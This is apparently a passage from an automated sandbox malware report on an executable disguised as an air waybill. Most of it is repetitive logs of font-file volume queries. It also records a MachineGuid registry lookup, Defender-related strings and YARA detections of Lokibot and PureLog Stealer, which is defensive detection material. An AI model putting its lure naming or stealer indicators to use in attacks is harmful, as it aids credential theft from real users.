Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 5516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 6536, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.2873103232.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

